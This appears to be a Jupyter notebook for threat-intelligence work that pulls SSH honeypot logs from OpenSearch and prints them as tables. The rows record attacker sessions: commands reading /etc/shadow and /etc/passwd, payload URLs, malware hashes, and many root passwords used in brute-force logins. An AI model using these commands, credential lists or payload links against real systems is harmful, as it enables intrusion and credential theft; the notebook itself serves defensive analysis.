# CNMa
###### Correlation N Matching

In [1]:
#import IP_address_filter
#import SG_IP_matching
#import xml_to_csv
#import virusTotal_api
import OS_API
import pandas as pd
from datetime import datetime
import time
import os
from tqdm import tqdm
import json

## Search in OpenSearch

In [2]:
#columns of interest
COLS = ['Src IP',
        'Src Port',
        'Dst IP',
        'Dst Port',
        'commands',
        'hashes',
        'urls',
        'loggedin',
        'startTime',
        'endTime',
        'sort_num',
        'Src Country',
        'Dst Country'
       ]

SIZE = 10000

In [3]:
def yesnocheck(param):
    while True:
        # Note: Python 2.x users should use raw_input, the equivalent of 3.x's input
        ans = input(f"{param}")
        if ans not in ['y', 'n']:
            continue            
        else:
            break
    return ans

#ans = yesnocheck("test")
#ans

In [8]:
#query inputting

defaultquery = [
    {'range': {'startTime':{'gte': 'now-1w/w',
                            'lte': 'now',
                            'format': 'strict_date_optional_time'}}},
                 {'exists': {'field': 'hashes'}},
                 {'match': {'geoip.country_name': 'Singapore'}},
                 {'query_string': {'default_field': 'commands', 'query': 'wget OR tftp'}}
               ]


def craft_query(devmode):
    queryls = []
    #dev mode to return default eg.
    while devmode:
        return defaultquery
    
    #custom input
    #Time range
    ans = yesnocheck("Filter on Time Range? y/n")
    if ans == 'y':
        start = str(input("Input start date:"))
        end = str(input("Input end date:"))
        rnge = {"range": {"startTime": {"gte": start, "lte": end, "format": "strict_date_optional_time"}}}
        queryls.append(rnge)    

    #Existing field
    while True:
        ans = yesnocheck("Filter if a field Exists? y/n")
        #print(ans)
        if ans == 'y':
            exist = input("Please enter field:")
            exst = {'exists': {'field': exist}}
            queryls.append(exst)
        else:
            break
    
    #Exact match on field
    while True:
        ans = yesnocheck("Exact match on a field? y/n")
        #print(ans)
        if ans == 'y':
            field = input("Please enter field:")
            value = input("Enter value to match:")
            mtch = {"match": {field: value}}
            queryls.append(mtch)
        else:
            break
    
    #General match query
    while True:
        ans = yesnocheck("General search query on a field? y/n")
        #print(ans)
        if ans == 'y':
            field = input("Please enter field:")
            query = input("Enter query:")
            qry = {"query_string": {"default_field": field, "query": query}}
            queryls.append(qry)
        else:
            break
    
    return queryls
    
#queryls = craft_query(True)
#queryls

In [9]:
size = 10000
search_after = [0]
df_os = pd.DataFrame(columns=COLS)

queryls = craft_query(True)
print(queryls)

total = 0

while (size == SIZE):
    print(f"Continue from record: {search_after}")
    data = OS_API.opensearch_request(size,queryls,search_after)
    df_os = pd.concat([df_os,data])
    
    #update params
    size = len(data) #exit once it completes last batch
    total+=size #update total records number
    search_after = data['sort_num'][len(data)-1] #update sort number to continue after
    #time.sleep(1)
    
print(f'Done. Total records: {total}')

[{'range': {'startTime': {'gte': 'now-1w/w', 'lte': 'now', 'format': 'strict_date_optional_time'}}}, {'exists': {'field': 'hashes'}}, {'match': {'geoip.country_name': 'Singapore'}}, {'query_string': {'default_field': 'commands', 'query': 'wget OR tftp'}}]
Continue from record: [0]
<Response [200]>, page successfully pulled.
Done. Total records: 2567


In [10]:
df_os

,Src IP,Src Port,Dst IP,Dst Port,commands,hashes,urls,loggedin,startTime,endTime,sort_num,Src Country,Dst Country
0,45.64.130.149,58716,103.13.114.133,22,[uname -a;id;cat /etc/shadow /etc/passwd;lscpu...,[ae9e5007de8b71cca7a456d1913be332258c60b1fb1a4...,"[http://sos.vivi.sg/ns1.jpg, http://sos.vivi.s...","[root, !QAZ2wsx]",2022-09-20T16:13:52.756779Z,2022-09-20T16:15:01.745121Z,[1663690501836],SG,US
1,45.64.130.149,60774,103.13.228.149,22,[uname -a;id;cat /etc/shadow /etc/passwd;lscpu...,[ae9e5007de8b71cca7a456d1913be332258c60b1fb1a4...,"[http://sos.vivi.sg/ns1.jpg, http://sos.vivi.s...","[root, !QAZ2wsx]",2022-09-20T16:14:02.777734Z,2022-09-20T16:15:04.740323Z,[1663690504807],SG,TH
2,45.64.130.149,34432,103.13.114.133,22,[uname -a;id;cat /etc/shadow /etc/passwd;lscpu...,[ae9e5007de8b71cca7a456d1913be332258c60b1fb1a4...,[http://sos.vivi.sg/ns1.jpg],"[root, !QAZ2wsx#EDC]",2022-09-20T16:14:04.987600Z,2022-09-20T16:15:06.720646Z,[1663690506892],SG,US
3,45.64.130.149,36490,103.13.228.149,22,[uname -a;id;cat /etc/shadow /etc/passwd;lscpu...,[ae9e5007de8b71cca7a456d1913be332258c60b1fb1a4...,"[http://sos.vivi.sg/ns1.jpg, http://sos.vivi.s...","[root, !QAZ2wsx#EDC]",2022-09-20T16:14:15.543491Z,2022-09-20T16:15:17.515332Z,[1663690517582],SG,TH
4,45.64.130.149,38370,103.13.114.133,22,[uname -a;id;cat /etc/shadow /etc/passwd;lscpu...,[ae9e5007de8b71cca7a456d1913be332258c60b1fb1a4...,"[http://sos.vivi.sg/ns1.jpg, http://sos.vivi.s...","[root, @huawei123]",2022-09-20T16:14:17.735828Z,2022-09-20T16:15:19.481462Z,[1663690519591],SG,US
...,...,...,...,...,...,...,...,...,...,...,...,...,...
2562,45.64.130.149,44724,103.216.223.30,22,[uname -a;id;cat /etc/shadow /etc/passwd;lscpu...,[f494991106ba8bcca0641b6cc94e5423d5479ac87ef27...,"[http://sos.vivi.sg/ns1.jpg, http://sos.vivi.s...","[root, huawei@321]",2022-09-29T03:11:00.674483Z,2022-09-29T03:11:47.767125Z,[1664421107916],SG,SG
2563,45.64.130.149,53826,103.216.223.13,22,[uname -a;id;cat /etc/shadow /etc/passwd;lscpu...,[ae9e5007de8b71cca7a456d1913be332258c60b1fb1a4...,"[http://sos.vivi.sg/ns1.jpg, http://sos.vivi.s...","[root, Huawei@321]",2022-09-29T03:09:45.180304Z,2022-09-29T03:11:47.769679Z,[1664421107918],SG,SG
2564,45.64.130.149,35510,103.216.223.13,22,[uname -a;id;cat /etc/shadow /etc/passwd;lscpu...,[ae9e5007de8b71cca7a456d1913be332258c60b1fb1a4...,"[http://sos.vivi.sg/ns1.jpg, http://sos.vivi.s...","[root, huawei@321]",2022-09-29T03:11:00.475887Z,2022-09-29T03:11:47.779165Z,[1664421107923],SG,SG
2565,45.64.130.149,41006,103.216.221.25,22,[uname -a;id;cat /etc/shadow /etc/passwd;lscpu...,[f494991106ba8bcca0641b6cc94e5423d5479ac87ef27...,"[http://sos.vivi.sg/ns1.jpg, http://sos.vivi.s...","[root, Huawei@321]",2022-09-29T03:09:45.323684Z,2022-09-29T03:11:47.790468Z,[1664421107923],SG,HK


In [11]:
df_os[df_os['Dst Country'].isna()].sort_values(by=['startTime'])

,Src IP,Src Port,Dst IP,Dst Port,commands,hashes,urls,loggedin,startTime,endTime,sort_num,Src Country,Dst Country
1469,45.64.130.149,48534,103.153.254.35,22,[uname -a;id;cat /etc/shadow /etc/passwd;lscpu...,[ae9e5007de8b71cca7a456d1913be332258c60b1fb1a4...,"[http://sos.vivi.sg/ns1.jpg, http://sos.vivi.s...","[root, !QAZ2wsx]",2022-09-26T10:14:35.111423Z,2022-09-26T10:15:39.533016Z,[1664187339600],SG,NaN
1468,45.64.130.149,41676,103.153.254.12,22,[uname -a;id;cat /etc/shadow /etc/passwd;lscpu...,[f494991106ba8bcca0641b6cc94e5423d5479ac87ef27...,"[http://sos.vivi.sg/ns1.jpg, http://sos.vivi.s...","[root, !QAZ2wsx]",2022-09-26T10:14:35.293683Z,2022-09-26T10:15:39.376497Z,[1664187339445],SG,NaN
1470,45.64.130.149,52868,103.153.254.35,22,[uname -a;id;cat /etc/shadow /etc/passwd;lscpu...,[ae9e5007de8b71cca7a456d1913be332258c60b1fb1a4...,"[http://sos.vivi.sg/ns1.jpg, http://sos.vivi.s...","[root, !QAZ2wsx#EDC]",2022-09-26T10:14:41.729100Z,2022-09-26T10:15:48.295857Z,[1664187348383],SG,NaN
1471,45.64.130.149,46010,103.153.254.12,22,[uname -a;id;cat /etc/shadow /etc/passwd;lscpu...,[f494991106ba8bcca0641b6cc94e5423d5479ac87ef27...,"[http://sos.vivi.sg/ns1.jpg, http://sos.vivi.s...","[root, !QAZ2wsx#EDC]",2022-09-26T10:14:41.773805Z,2022-09-26T10:15:49.215799Z,[1664187349352],SG,NaN
1473,45.64.130.149,57208,103.153.254.35,22,[uname -a;id;cat /etc/shadow /etc/passwd;lscpu...,[ae9e5007de8b71cca7a456d1913be332258c60b1fb1a4...,"[http://sos.vivi.sg/ns1.jpg, http://sos.vivi.s...","[root, @huawei123]",2022-09-26T10:14:50.069394Z,2022-09-26T10:15:56.237222Z,[1664187356320],SG,NaN
...,...,...,...,...,...,...,...,...,...,...,...,...,...
1995,45.64.130.149,34874,103.162.98.121,22,[uname -a;id;cat /etc/shadow /etc/passwd;lscpu...,[f494991106ba8bcca0641b6cc94e5423d5479ac87ef27...,"[http://sos.vivi.sg/ns1.jpg, http://sos.vivi.s...","[root, !Q@W3e4r]",2022-09-26T19:48:50.924163Z,2022-09-26T19:49:53.204731Z,[1664221793272],SG,NaN
1996,45.64.130.149,37740,103.162.98.121,22,[uname -a;id;cat /etc/shadow /etc/passwd;lscpu...,[f494991106ba8bcca0641b6cc94e5423d5479ac87ef27...,"[http://sos.vivi.sg/ns1.jpg, http://sos.vivi.s...","[root, macacpetine]",2022-09-26T19:48:57.097856Z,2022-09-26T19:49:59.218115Z,[1664221799286],SG,NaN
1997,45.64.130.149,39970,103.162.98.121,22,[uname -a;id;cat /etc/shadow /etc/passwd;lscpu...,[f494991106ba8bcca0641b6cc94e5423d5479ac87ef27...,"[http://sos.vivi.sg/ns1.jpg, http://sos.vivi.s...","[root, jkh12kj3h1kj2h3kj12h3jk1h23]",2022-09-26T19:49:02.620554Z,2022-09-26T19:50:05.626929Z,[1664221805695],SG,NaN
1998,45.64.130.149,45028,103.162.98.121,22,[uname -a;id;cat /etc/shadow /etc/passwd;lscpu...,[f494991106ba8bcca0641b6cc94e5423d5479ac87ef27...,"[http://sos.vivi.sg/ns1.jpg, http://sos.vivi.s...","[root, 0-0KLkO9IKJkJKjkJKJ9890-.o]",2022-09-26T19:49:14.334759Z,2022-09-26T19:50:16.698013Z,[1664221816767],SG,NaN


In [8]:
search_after = [0]
data = OS_API.opensearch_request(queryls = queryls , search_after = search_after)
data

<Response [200]>


,Src IP,Src Port,Dst IP,Dst Port,commands,hashes,urls,loggedin,startTime,endTime,sort_num,Src Country,Dst Country
0,45.64.130.149,59640,102.68.85.168,22,[uname -a;id;cat /etc/shadow /etc/passwd;lscpu...,[f494991106ba8bcca0641b6cc94e5423d5479ac87ef27...,"[http://sos.vivi.sg/ns1.jpg, http://sos.vivi.s...","[root, !QAZ2wsx]",2022-09-18T07:41:09.169345Z,2022-09-18T07:42:12.587998Z,[1663486932655],SG,NG
1,45.64.130.149,33968,102.68.85.168,22,[uname -a;id;cat /etc/shadow /etc/passwd;lscpu...,[f494991106ba8bcca0641b6cc94e5423d5479ac87ef27...,"[http://sos.vivi.sg/ns1.jpg, http://sos.vivi.s...","[root, !QAZ2wsx#EDC]",2022-09-18T07:41:16.507088Z,2022-09-18T07:42:21.014722Z,[1663486941081],SG,NG
2,45.64.130.149,36528,102.68.85.168,22,[uname -a;id;cat /etc/shadow /etc/passwd;lscpu...,[f494991106ba8bcca0641b6cc94e5423d5479ac87ef27...,"[http://sos.vivi.sg/ns1.jpg, http://sos.vivi.s...","[root, @huawei123]",2022-09-18T07:41:24.406832Z,2022-09-18T07:42:27.780329Z,[1663486947847],SG,NG
3,45.64.130.149,39086,102.68.85.168,22,[uname -a;id;cat /etc/shadow /etc/passwd;lscpu...,[f494991106ba8bcca0641b6cc94e5423d5479ac87ef27...,"[http://sos.vivi.sg/ns1.jpg, http://sos.vivi.s...","[root, @Huawei123]",2022-09-18T07:41:32.518036Z,2022-09-18T07:42:39.210598Z,[1663486959279],SG,NG
4,45.64.130.149,41666,102.68.85.168,22,[uname -a;id;cat /etc/shadow /etc/passwd;lscpu...,[f494991106ba8bcca0641b6cc94e5423d5479ac87ef27...,"[http://sos.vivi.sg/ns1.jpg, http://sos.vivi.s...","[root, @WSX1qaz]",2022-09-18T07:41:42.042176Z,2022-09-18T07:42:46.477892Z,[1663486966545],SG,NG
...,...,...,...,...,...,...,...,...,...,...,...,...,...
799,45.64.130.149,38160,103.57.251.155,22,[uname -a;id;cat /etc/shadow /etc/passwd;lscpu...,[f494991106ba8bcca0641b6cc94e5423d5479ac87ef27...,"[http://sos.vivi.sg/ns1.jpg, http://sos.vivi.s...","[root, !Q@W3e4r]",2022-09-22T10:14:33.436693Z,2022-09-22T10:15:35.294061Z,[1663841735363],SG,IN
800,45.64.130.149,40942,103.57.251.155,22,[uname -a;id;cat /etc/shadow /etc/passwd;lscpu...,[f494991106ba8bcca0641b6cc94e5423d5479ac87ef27...,"[http://sos.vivi.sg/ns1.jpg, http://sos.vivi.s...","[root, macacpetine]",2022-09-22T10:14:40.240183Z,2022-09-22T10:15:41.960728Z,[1663841742034],SG,IN
801,45.64.130.149,43490,103.57.251.155,22,[uname -a;id;cat /etc/shadow /etc/passwd;lscpu...,[f494991106ba8bcca0641b6cc94e5423d5479ac87ef27...,"[http://sos.vivi.sg/ns1.jpg, http://sos.vivi.s...","[root, jkh12kj3h1kj2h3kj12h3jk1h23]",2022-09-22T10:14:47.208585Z,2022-09-22T10:15:48.938938Z,[1663841749009],SG,IN
802,45.64.130.149,48640,103.57.251.155,22,[uname -a;id;cat /etc/shadow /etc/passwd;lscpu...,[f494991106ba8bcca0641b6cc94e5423d5479ac87ef27...,"[http://sos.vivi.sg/ns1.jpg, http://sos.vivi.s...","[root, 0-0KLkO9IKJkJKjkJKJ9890-.o]",2022-09-22T10:15:01.234914Z,2022-09-22T10:16:03.167784Z,[1663841763236],SG,IN


In [ ]:
'''
#export to csv
df_os.to_csv("opensearch_matched" + "_" + str(datetime.now().strftime('%Y_%m_%d_%H_%M_%S')) + ".csv", index=False)
'''

In [8]:
#Date inputs
year = "2022"
print('start month?')
m1 = input()
print('start day?')
d1 = input()
print('end month?')
m2 = input()
print('end day?')
d2 = input()

start_date = f"{year}-{str(100+int(m1))[-2:]}-{str(100+int(d1))[-2:]}T00:00:00.000Z"
end_date = f"{year}-{str(100+int(m2))[-2:]}-{str(100+int(d2))[-2:]}T00:00:00.000Z"
print(f"Start date: {start_date}\n End date: {end_date}")

start month?


 9


start day?


 9


end month?


 9


end day?


 9


Start date: 2022-09-09T00:00:00.000Z
 End date: 2022-09-09T00:00:00.000Z
